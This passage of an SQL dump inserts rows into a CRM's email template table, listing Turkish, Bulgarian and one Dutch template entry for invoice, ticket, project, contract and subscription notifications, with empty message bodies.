(239, 'invoice', 'invoice-send-to-client', 'turkish', 'Send Invoice to Customer [turkish]', 'Invoice with number {invoice_number} created', '', '{companyname} | CRM', '', 0, 0, 0),
(240, 'ticket', 'new-ticket-opened-admin', 'turkish', 'New Ticket Opened (Opened by Staff, Sent to Customer) [turkish]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(241, 'ticket', 'ticket-reply', 'turkish', 'Ticket Reply (Sent to Customer) [turkish]', 'New Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(242, 'ticket', 'ticket-autoresponse', 'turkish', 'New Ticket Opened - Autoresponse [turkish]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(243, 'invoice', 'invoice-payment-recorded', 'turkish', 'Invoice Payment Recorded (Sent to Customer) [turkish]', 'Invoice Payment Recorded', '', '{companyname} | CRM', '', 0, 1, 0),
(244, 'invoice', 'invoice-overdue-notice', 'turkish', 'Invoice Overdue Notice [turkish]', 'Invoice Overdue Notice - {invoice_number}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(245, 'invoice', 'invoice-already-send', 'turkish', 'Invoice Already Sent to Customer [turkish]', 'Invoice # {invoice_number} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(246, 'ticket', 'new-ticket-created-staff', 'turkish', 'New Ticket Created (Opened by Customer, Sent to Staff Members) [turkish]', 'New Ticket Created', '', '{companyname} | CRM', '', 0, 1, 0),
(247, 'estimate', 'estimate-send-to-client', 'turkish', 'Send Estimate to Customer [turkish]', 'Estimate # {estimate_number} created', '', '{companyname} |  yêu cầu', '', 0, 0, 0),
(248, 'ticket', 'ticket-reply-to-admin', 'turkish', 'Ticket Reply (Sent to Staff) [turkish]', 'New Support Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(249, 'estimate', 'estimate-already-send', 'turkish', 'Estimate Already Sent to Customer [turkish]', 'Estimate # {estimate_number} ', '', '{companyname} | CRM', '', 0, 0, 0),
(250, 'contract', 'contract-expiration', 'turkish', 'Contract Expiration Reminder (Sent to Customer Contacts) [turkish]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 0, 0),
(251, 'tasks', 'task-assigned', 'turkish', 'New Task Assigned (Sent to Staff) [turkish]', 'New Task Assigned to You - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(252, 'tasks', 'task-added-as-follower', 'turkish', 'Staff Member Added as Follower on Task (Sent to Staff) [turkish]', 'You are added as follower on task - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(253, 'tasks', 'task-commented', 'turkish', 'New Comment on Task (Sent to Staff) [turkish]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(254, 'tasks', 'task-added-attachment', 'turkish', 'New Attachment(s) on Task (Sent to Staff) [turkish]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(255, 'estimate', 'estimate-declined-to-staff', 'turkish', 'Estimate Declined (Sent to Staff) [turkish]', 'Customer Declined Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(256, 'estimate', 'estimate-accepted-to-staff', 'turkish', 'Estimate Accepted (Sent to Staff) [turkish]', 'Customer Accepted Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(257, 'proposals', 'proposal-client-accepted', 'turkish', 'Customer Action - Accepted (Sent to Staff) [turkish]', 'Customer Accepted Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(258, 'proposals', 'proposal-send-to-customer', 'turkish', 'Send Proposal to Customer [turkish]', 'Proposal With Number {proposal_number} Created', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(259, 'proposals', 'proposal-client-declined', 'turkish', 'Customer Action - Declined (Sent to Staff) [turkish]', 'Client Declined Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(260, 'proposals', 'proposal-client-thank-you', 'turkish', 'Thank You Email (Sent to Customer After Accept) [turkish]', 'Thank for you accepting proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(261, 'proposals', 'proposal-comment-to-client', 'turkish', 'New Comment  (Sent to Customer/Lead) [turkish]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(262, 'proposals', 'proposal-comment-to-admin', 'turkish', 'New Comment (Sent to Staff)  [turkish]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(263, 'estimate', 'estimate-thank-you-to-customer', 'turkish', 'Thank You Email (Sent to Customer After Accept) [turkish]', 'Thank for you accepting estimate', '', '{companyname} | CRM', '', 0, 1, 0),
(264, 'tasks', 'task-deadline-notification', 'turkish', 'Task Deadline Reminder - Sent to Assigned Members [turkish]', 'Task Deadline Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(265, 'contract', 'send-contract', 'turkish', 'Send Contract to Customer [turkish]', 'Contract - {contract_subject}', '', '{companyname} | CRM', NULL, 0, 0, 0),
(266, 'invoice', 'invoice-payment-recorded-to-staff', 'turkish', 'Invoice Payment Recorded (Sent to Staff) [turkish]', 'New Invoice Payment', '', '{companyname} | CRM', '', 0, 1, 0),
(267, 'ticket', 'auto-close-ticket', 'turkish', 'Auto Close Ticket [turkish]', 'Ticket Auto Closed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(268, 'project', 'new-project-discussion-created-to-staff', 'turkish', 'New Project Discussion (Sent to Project Members) [turkish]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(269, 'project', 'new-project-discussion-created-to-customer', 'turkish', 'New Project Discussion (Sent to Customer Contacts) [turkish]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(270, 'project', 'new-project-file-uploaded-to-customer', 'turkish', 'New Project File(s) Uploaded (Sent to Customer Contacts) [turkish]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(271, 'project', 'new-project-file-uploaded-to-staff', 'turkish', 'New Project File(s) Uploaded (Sent to Project Members) [turkish]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(272, 'project', 'new-project-discussion-comment-to-customer', 'turkish', 'New Discussion Comment  (Sent to Customer Contacts) [turkish]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(273, 'project', 'new-project-discussion-comment-to-staff', 'turkish', 'New Discussion Comment (Sent to Project Members) [turkish]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(274, 'project', 'staff-added-as-project-member', 'turkish', 'Staff Added as Project Member [turkish]', 'New project assigned to you', '', '{companyname} | CRM', NULL, 0, 1, 0),
(275, 'estimate', 'estimate-expiry-reminder', 'turkish', 'Estimate Expiration Reminder [turkish]', 'Estimate Expiration Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(276, 'proposals', 'proposal-expiry-reminder', 'turkish', 'Proposal Expiration Reminder [turkish]', 'Proposal Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(277, 'staff', 'new-staff-created', 'turkish', 'New Staff Created (Welcome Email) [turkish]', 'You are added as staff member', '', '{companyname} | CRM', '', 0, 0, 0),
(278, 'client', 'contact-forgot-password', 'turkish', 'Forgot Password [turkish]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 0, 0),
(279, 'client', 'contact-password-reseted', 'turkish', 'Password Reset - Confirmation [turkish]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(280, 'client', 'contact-set-password', 'turkish', 'Set New Password [turkish]', 'Set new password on {companyname} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(281, 'staff', 'staff-forgot-password', 'turkish', 'Forgot Password [turkish]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 1, 0),
(282, 'staff', 'staff-password-reseted', 'turkish', 'Password Reset - Confirmation [turkish]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(283, 'project', 'assigned-to-project', 'turkish', 'New Project Created (Sent to Customer Contacts) [turkish]', 'New Project Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(284, 'tasks', 'task-added-attachment-to-contacts', 'turkish', 'New Attachment(s) on Task (Sent to Customer Contacts) [turkish]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(285, 'tasks', 'task-commented-to-contacts', 'turkish', 'New Comment on Task (Sent to Customer Contacts) [turkish]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(286, 'leads', 'new-lead-assigned', 'turkish', 'New Lead Assigned to Staff Member [turkish]', 'New lead assigned to you', '', '{companyname} | CRM', '', 0, 0, 0),
(287, 'client', 'client-statement', 'turkish', 'Statement - Account Summary [turkish]', 'Account Statement from {statement_from} to {statement_to}', '', '{companyname} | CRM', '', 0, 0, 0),
(288, 'ticket', 'ticket-assigned-to-admin', 'turkish', 'New Ticket Assigned (Sent to Staff) [turkish]', 'New support ticket has been assigned to you', '', '{companyname} | CRM', '', 0, 1, 0),
(289, 'client', 'new-client-registered-to-admin', 'turkish', 'New Customer Registration (Sent to admins) [turkish]', 'New Customer Registration', '', '{companyname} | CRM', NULL, 0, 0, 0),
(290, 'leads', 'new-web-to-lead-form-submitted', 'turkish', 'Web to lead form submitted - Sent to lead [turkish]', '{lead_name} - We Received Your Request', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(291, 'staff', 'two-factor-authentication', 'turkish', 'Two Factor Authentication [turkish]', 'Confirm Your Login', '', '{companyname} | CRM', NULL, 0, 1, 0),
(292, 'project', 'project-finished-to-customer', 'turkish', 'Project Marked as Finished (Sent to Customer Contacts) [turkish]', 'Project Marked as Finished', '', '{companyname} | CRM', NULL, 0, 1, 0),
(293, 'credit_note', 'credit-note-send-to-client', 'turkish', 'Send Credit Note To Email [turkish]', 'Credit Note With Number #{credit_note_number} Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(294, 'tasks', 'task-status-change-to-staff', 'turkish', 'Task Status Changed (Sent to Staff) [turkish]', 'Task Status Changed', '', '{companyname} | CRM', '', 0, 1, 0),
(295, 'tasks', 'task-status-change-to-contacts', 'turkish', 'Task Status Changed (Sent to Customer Contacts) [turkish]', 'Task Status Changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(296, 'staff', 'reminder-email-staff', 'turkish', 'Staff Reminder Email [turkish]', 'You Have a New Reminder!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(297, 'contract', 'contract-comment-to-client', 'turkish', 'New Comment  (Sent to Customer Contacts) [turkish]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 0, 0),
(298, 'contract', 'contract-comment-to-admin', 'turkish', 'New Comment (Sent to Staff)  [turkish]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(299, 'subscriptions', 'send-subscription', 'turkish', 'Send Subscription to Customer [turkish]', 'Subscription Created', '', '{companyname} | CRM', '', 1, 0, 0),
(300, 'subscriptions', 'subscription-payment-failed', 'turkish', 'Subscription Payment Failed [turkish]', 'Your most recent invoice payment failed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(301, 'subscriptions', 'subscription-canceled', 'turkish', 'Subscription Canceled (Sent to customer primary contact) [turkish]', 'Your subscription has been canceled', '', '{companyname} | CRM', NULL, 0, 1, 0),
(302, 'subscriptions', 'subscription-payment-succeeded', 'turkish', 'Subscription Payment Succeeded (Sent to customer primary contact) [turkish]', 'Subscription  Payment Receipt - {subscription_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(303, 'contract', 'contract-expiration-to-staff', 'turkish', 'Contract Expiration Reminder (Sent to Staff) [turkish]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(304, 'gdpr', 'gdpr-removal-request', 'turkish', 'Removal Request From Contact (Sent to administrators) [turkish]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(305, 'gdpr', 'gdpr-removal-request-lead', 'turkish', 'Removal Request From Lead (Sent to administrators) [turkish]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(306, 'client', 'client-registration-confirmed', 'turkish', 'Customer Registration Confirmed [turkish]', 'Your registration is confirmed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(307, 'contract', 'contract-signed-to-staff', 'turkish', 'Contract Signed (Sent to Staff) [turkish]', 'Customer Signed a Contract', '', '{companyname} | CRM', NULL, 0, 1, 0),
(308, 'subscriptions', 'customer-subscribed-to-staff', 'turkish', 'Customer Subscribed to a Subscription (Sent to administrators and subscription creator) [turkish]', 'Customer Subscribed to a Subscription', '', '{companyname} | CRM', NULL, 0, 1, 0),
(309, 'client', 'contact-verification-email', 'turkish', 'Email Verification (Sent to Contact After Registration) [turkish]', 'Verify Email Address', '', '{companyname} | CRM', NULL, 0, 0, 0),
(310, 'client', 'new-customer-profile-file-uploaded-to-staff', 'turkish', 'New Customer Profile File(s) Uploaded (Sent to Staff) [turkish]', 'Customer Uploaded New File(s) in Profile', '', '{companyname} | CRM', NULL, 0, 0, 0),
(311, 'staff', 'event-notification-to-staff', 'turkish', 'Event Notification (Calendar) [turkish]', 'Upcoming Event - {event_title}', '', '', NULL, 0, 1, 0),
(312, 'subscriptions', 'subscription-payment-requires-action', 'turkish', 'Credit Card Authorization Required - SCA [turkish]', 'Important: Confirm your subscription {subscription_name} payment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(313, 'invoice', 'invoice-due-notice', 'turkish', 'Invoice Due Notice [turkish]', 'Your {invoice_number} will be due soon', '', '{companyname} | CRM', NULL, 0, 1, 0),
(314, 'estimate_request', 'estimate-request-submitted-to-staff', 'turkish', 'Estimate Request Submitted (Sent to Staff) [turkish]', 'New Estimate Request Submitted', '', '{companyname} | CRM Tổ chức đào tạo WIT', '', 0, 1, 0),
(315, 'estimate_request', 'estimate-request-assigned', 'turkish', 'Estimate Request Assigned (Sent to Staff) [turkish]', 'New Estimate Request Assigned', '', '{companyname} | CRM', NULL, 0, 1, 0),
(316, 'estimate_request', 'estimate-request-received-to-user', 'turkish', 'Estimate Request Received (Sent to User) [turkish]', 'Estimate Request Received', '', '{companyname} | CRM', NULL, 0, 0, 0),
(317, 'client', 'new-client-created', 'bulgarian', 'New Contact Added/Registered (Welcome Email) [bulgarian]', 'Welcome aboard', '', '{companyname} | CRM', NULL, 0, 0, 0),
(318, 'invoice', 'invoice-send-to-client', 'bulgarian', 'Send Invoice to Customer [bulgarian]', 'Invoice with number {invoice_number} created', '', '{companyname} | CRM', '', 0, 0, 0),
(319, 'ticket', 'new-ticket-opened-admin', 'bulgarian', 'New Ticket Opened (Opened by Staff, Sent to Customer) [bulgarian]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(320, 'ticket', 'ticket-reply', 'bulgarian', 'Ticket Reply (Sent to Customer) [bulgarian]', 'New Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(321, 'ticket', 'ticket-autoresponse', 'bulgarian', 'New Ticket Opened - Autoresponse [bulgarian]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(322, 'invoice', 'invoice-payment-recorded', 'bulgarian', 'Invoice Payment Recorded (Sent to Customer) [bulgarian]', 'Invoice Payment Recorded', '', '{companyname} | CRM', '', 0, 1, 0),
(323, 'invoice', 'invoice-overdue-notice', 'bulgarian', 'Invoice Overdue Notice [bulgarian]', 'Invoice Overdue Notice - {invoice_number}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(324, 'invoice', 'invoice-already-send', 'bulgarian', 'Invoice Already Sent to Customer [bulgarian]', 'Invoice # {invoice_number} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(325, 'ticket', 'new-ticket-created-staff', 'bulgarian', 'New Ticket Created (Opened by Customer, Sent to Staff Members) [bulgarian]', 'New Ticket Created', '', '{companyname} | CRM', '', 0, 1, 0),
(326, 'estimate', 'estimate-send-to-client', 'bulgarian', 'Send Estimate to Customer [bulgarian]', 'Estimate # {estimate_number} created', '', '{companyname} |  yêu cầu', '', 0, 0, 0),
(327, 'ticket', 'ticket-reply-to-admin', 'bulgarian', 'Ticket Reply (Sent to Staff) [bulgarian]', 'New Support Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0);
INSERT INTO `tblemailtemplates` (`emailtemplateid`, `type`, `slug`, `language`, `name`, `subject`, `message`, `fromname`, `fromemail`, `plaintext`, `active`, `order`) VALUES
(328, 'estimate', 'estimate-already-send', 'bulgarian', 'Estimate Already Sent to Customer [bulgarian]', 'Estimate # {estimate_number} ', '', '{companyname} | CRM', '', 0, 0, 0),
(329, 'contract', 'contract-expiration', 'bulgarian', 'Contract Expiration Reminder (Sent to Customer Contacts) [bulgarian]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 0, 0),
(330, 'tasks', 'task-assigned', 'bulgarian', 'New Task Assigned (Sent to Staff) [bulgarian]', 'New Task Assigned to You - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(331, 'tasks', 'task-added-as-follower', 'bulgarian', 'Staff Member Added as Follower on Task (Sent to Staff) [bulgarian]', 'You are added as follower on task - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(332, 'tasks', 'task-commented', 'bulgarian', 'New Comment on Task (Sent to Staff) [bulgarian]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(333, 'tasks', 'task-added-attachment', 'bulgarian', 'New Attachment(s) on Task (Sent to Staff) [bulgarian]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(334, 'estimate', 'estimate-declined-to-staff', 'bulgarian', 'Estimate Declined (Sent to Staff) [bulgarian]', 'Customer Declined Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(335, 'estimate', 'estimate-accepted-to-staff', 'bulgarian', 'Estimate Accepted (Sent to Staff) [bulgarian]', 'Customer Accepted Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(336, 'proposals', 'proposal-client-accepted', 'bulgarian', 'Customer Action - Accepted (Sent to Staff) [bulgarian]', 'Customer Accepted Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(337, 'proposals', 'proposal-send-to-customer', 'bulgarian', 'Send Proposal to Customer [bulgarian]', 'Proposal With Number {proposal_number} Created', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(338, 'proposals', 'proposal-client-declined', 'bulgarian', 'Customer Action - Declined (Sent to Staff) [bulgarian]', 'Client Declined Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(339, 'proposals', 'proposal-client-thank-you', 'bulgarian', 'Thank You Email (Sent to Customer After Accept) [bulgarian]', 'Thank for you accepting proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(340, 'proposals', 'proposal-comment-to-client', 'bulgarian', 'New Comment  (Sent to Customer/Lead) [bulgarian]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(341, 'proposals', 'proposal-comment-to-admin', 'bulgarian', 'New Comment (Sent to Staff)  [bulgarian]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(342, 'estimate', 'estimate-thank-you-to-customer', 'bulgarian', 'Thank You Email (Sent to Customer After Accept) [bulgarian]', 'Thank for you accepting estimate', '', '{companyname} | CRM', '', 0, 1, 0),
(343, 'tasks', 'task-deadline-notification', 'bulgarian', 'Task Deadline Reminder - Sent to Assigned Members [bulgarian]', 'Task Deadline Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(344, 'contract', 'send-contract', 'bulgarian', 'Send Contract to Customer [bulgarian]', 'Contract - {contract_subject}', '', '{companyname} | CRM', NULL, 0, 0, 0),
(345, 'invoice', 'invoice-payment-recorded-to-staff', 'bulgarian', 'Invoice Payment Recorded (Sent to Staff) [bulgarian]', 'New Invoice Payment', '', '{companyname} | CRM', '', 0, 1, 0),
(346, 'ticket', 'auto-close-ticket', 'bulgarian', 'Auto Close Ticket [bulgarian]', 'Ticket Auto Closed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(347, 'project', 'new-project-discussion-created-to-staff', 'bulgarian', 'New Project Discussion (Sent to Project Members) [bulgarian]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(348, 'project', 'new-project-discussion-created-to-customer', 'bulgarian', 'New Project Discussion (Sent to Customer Contacts) [bulgarian]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(349, 'project', 'new-project-file-uploaded-to-customer', 'bulgarian', 'New Project File(s) Uploaded (Sent to Customer Contacts) [bulgarian]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(350, 'project', 'new-project-file-uploaded-to-staff', 'bulgarian', 'New Project File(s) Uploaded (Sent to Project Members) [bulgarian]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(351, 'project', 'new-project-discussion-comment-to-customer', 'bulgarian', 'New Discussion Comment  (Sent to Customer Contacts) [bulgarian]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(352, 'project', 'new-project-discussion-comment-to-staff', 'bulgarian', 'New Discussion Comment (Sent to Project Members) [bulgarian]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(353, 'project', 'staff-added-as-project-member', 'bulgarian', 'Staff Added as Project Member [bulgarian]', 'New project assigned to you', '', '{companyname} | CRM', NULL, 0, 1, 0),
(354, 'estimate', 'estimate-expiry-reminder', 'bulgarian', 'Estimate Expiration Reminder [bulgarian]', 'Estimate Expiration Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(355, 'proposals', 'proposal-expiry-reminder', 'bulgarian', 'Proposal Expiration Reminder [bulgarian]', 'Proposal Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(356, 'staff', 'new-staff-created', 'bulgarian', 'New Staff Created (Welcome Email) [bulgarian]', 'You are added as staff member', '', '{companyname} | CRM', '', 0, 0, 0),
(357, 'client', 'contact-forgot-password', 'bulgarian', 'Forgot Password [bulgarian]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 0, 0),
(358, 'client', 'contact-password-reseted', 'bulgarian', 'Password Reset - Confirmation [bulgarian]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(359, 'client', 'contact-set-password', 'bulgarian', 'Set New Password [bulgarian]', 'Set new password on {companyname} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(360, 'staff', 'staff-forgot-password', 'bulgarian', 'Forgot Password [bulgarian]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 1, 0),
(361, 'staff', 'staff-password-reseted', 'bulgarian', 'Password Reset - Confirmation [bulgarian]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(362, 'project', 'assigned-to-project', 'bulgarian', 'New Project Created (Sent to Customer Contacts) [bulgarian]', 'New Project Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(363, 'tasks', 'task-added-attachment-to-contacts', 'bulgarian', 'New Attachment(s) on Task (Sent to Customer Contacts) [bulgarian]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(364, 'tasks', 'task-commented-to-contacts', 'bulgarian', 'New Comment on Task (Sent to Customer Contacts) [bulgarian]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(365, 'leads', 'new-lead-assigned', 'bulgarian', 'New Lead Assigned to Staff Member [bulgarian]', 'New lead assigned to you', '', '{companyname} | CRM', '', 0, 0, 0),
(366, 'client', 'client-statement', 'bulgarian', 'Statement - Account Summary [bulgarian]', 'Account Statement from {statement_from} to {statement_to}', '', '{companyname} | CRM', '', 0, 0, 0),
(367, 'ticket', 'ticket-assigned-to-admin', 'bulgarian', 'New Ticket Assigned (Sent to Staff) [bulgarian]', 'New support ticket has been assigned to you', '', '{companyname} | CRM', '', 0, 1, 0),
(368, 'client', 'new-client-registered-to-admin', 'bulgarian', 'New Customer Registration (Sent to admins) [bulgarian]', 'New Customer Registration', '', '{companyname} | CRM', NULL, 0, 0, 0),
(369, 'leads', 'new-web-to-lead-form-submitted', 'bulgarian', 'Web to lead form submitted - Sent to lead [bulgarian]', '{lead_name} - We Received Your Request', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(370, 'staff', 'two-factor-authentication', 'bulgarian', 'Two Factor Authentication [bulgarian]', 'Confirm Your Login', '', '{companyname} | CRM', NULL, 0, 1, 0),
(371, 'project', 'project-finished-to-customer', 'bulgarian', 'Project Marked as Finished (Sent to Customer Contacts) [bulgarian]', 'Project Marked as Finished', '', '{companyname} | CRM', NULL, 0, 1, 0),
(372, 'credit_note', 'credit-note-send-to-client', 'bulgarian', 'Send Credit Note To Email [bulgarian]', 'Credit Note With Number #{credit_note_number} Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(373, 'tasks', 'task-status-change-to-staff', 'bulgarian', 'Task Status Changed (Sent to Staff) [bulgarian]', 'Task Status Changed', '', '{companyname} | CRM', '', 0, 1, 0),
(374, 'tasks', 'task-status-change-to-contacts', 'bulgarian', 'Task Status Changed (Sent to Customer Contacts) [bulgarian]', 'Task Status Changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(375, 'staff', 'reminder-email-staff', 'bulgarian', 'Staff Reminder Email [bulgarian]', 'You Have a New Reminder!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(376, 'contract', 'contract-comment-to-client', 'bulgarian', 'New Comment  (Sent to Customer Contacts) [bulgarian]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 0, 0),
(377, 'contract', 'contract-comment-to-admin', 'bulgarian', 'New Comment (Sent to Staff)  [bulgarian]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(378, 'subscriptions', 'send-subscription', 'bulgarian', 'Send Subscription to Customer [bulgarian]', 'Subscription Created', '', '{companyname} | CRM', '', 1, 0, 0),
(379, 'subscriptions', 'subscription-payment-failed', 'bulgarian', 'Subscription Payment Failed [bulgarian]', 'Your most recent invoice payment failed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(380, 'subscriptions', 'subscription-canceled', 'bulgarian', 'Subscription Canceled (Sent to customer primary contact) [bulgarian]', 'Your subscription has been canceled', '', '{companyname} | CRM', NULL, 0, 1, 0),
(381, 'subscriptions', 'subscription-payment-succeeded', 'bulgarian', 'Subscription Payment Succeeded (Sent to customer primary contact) [bulgarian]', 'Subscription  Payment Receipt - {subscription_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(382, 'contract', 'contract-expiration-to-staff', 'bulgarian', 'Contract Expiration Reminder (Sent to Staff) [bulgarian]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(383, 'gdpr', 'gdpr-removal-request', 'bulgarian', 'Removal Request From Contact (Sent to administrators) [bulgarian]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(384, 'gdpr', 'gdpr-removal-request-lead', 'bulgarian', 'Removal Request From Lead (Sent to administrators) [bulgarian]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(385, 'client', 'client-registration-confirmed', 'bulgarian', 'Customer Registration Confirmed [bulgarian]', 'Your registration is confirmed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(386, 'contract', 'contract-signed-to-staff', 'bulgarian', 'Contract Signed (Sent to Staff) [bulgarian]', 'Customer Signed a Contract', '', '{companyname} | CRM', NULL, 0, 1, 0),
(387, 'subscriptions', 'customer-subscribed-to-staff', 'bulgarian', 'Customer Subscribed to a Subscription (Sent to administrators and subscription creator) [bulgarian]', 'Customer Subscribed to a Subscription', '', '{companyname} | CRM', NULL, 0, 1, 0),
(388, 'client', 'contact-verification-email', 'bulgarian', 'Email Verification (Sent to Contact After Registration) [bulgarian]', 'Verify Email Address', '', '{companyname} | CRM', NULL, 0, 0, 0),
(389, 'client', 'new-customer-profile-file-uploaded-to-staff', 'bulgarian', 'New Customer Profile File(s) Uploaded (Sent to Staff) [bulgarian]', 'Customer Uploaded New File(s) in Profile', '', '{companyname} | CRM', NULL, 0, 0, 0),
(390, 'staff', 'event-notification-to-staff', 'bulgarian', 'Event Notification (Calendar) [bulgarian]', 'Upcoming Event - {event_title}', '', '', NULL, 0, 1, 0),
(391, 'subscriptions', 'subscription-payment-requires-action', 'bulgarian', 'Credit Card Authorization Required - SCA [bulgarian]', 'Important: Confirm your subscription {subscription_name} payment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(392, 'invoice', 'invoice-due-notice', 'bulgarian', 'Invoice Due Notice [bulgarian]', 'Your {invoice_number} will be due soon', '', '{companyname} | CRM', NULL, 0, 1, 0),
(393, 'estimate_request', 'estimate-request-submitted-to-staff', 'bulgarian', 'Estimate Request Submitted (Sent to Staff) [bulgarian]', 'New Estimate Request Submitted', '', '{companyname} | CRM Tổ chức đào tạo WIT', '', 0, 1, 0),
(394, 'estimate_request', 'estimate-request-assigned', 'bulgarian', 'Estimate Request Assigned (Sent to Staff) [bulgarian]', 'New Estimate Request Assigned', '', '{companyname} | CRM', NULL, 0, 1, 0),
(395, 'estimate_request', 'estimate-request-received-to-user', 'bulgarian', 'Estimate Request Received (Sent to User) [bulgarian]', 'Estimate Request Received', '', '{companyname} | CRM', NULL, 0, 0, 0),
(396, 'client', 'new-client-created', 'dutch', 'New Contact Added/Registered (Welcome Email) [dutch]', 'Welcome aboard', '', '{companyname} | CRM', NULL, 0, 0, 0),
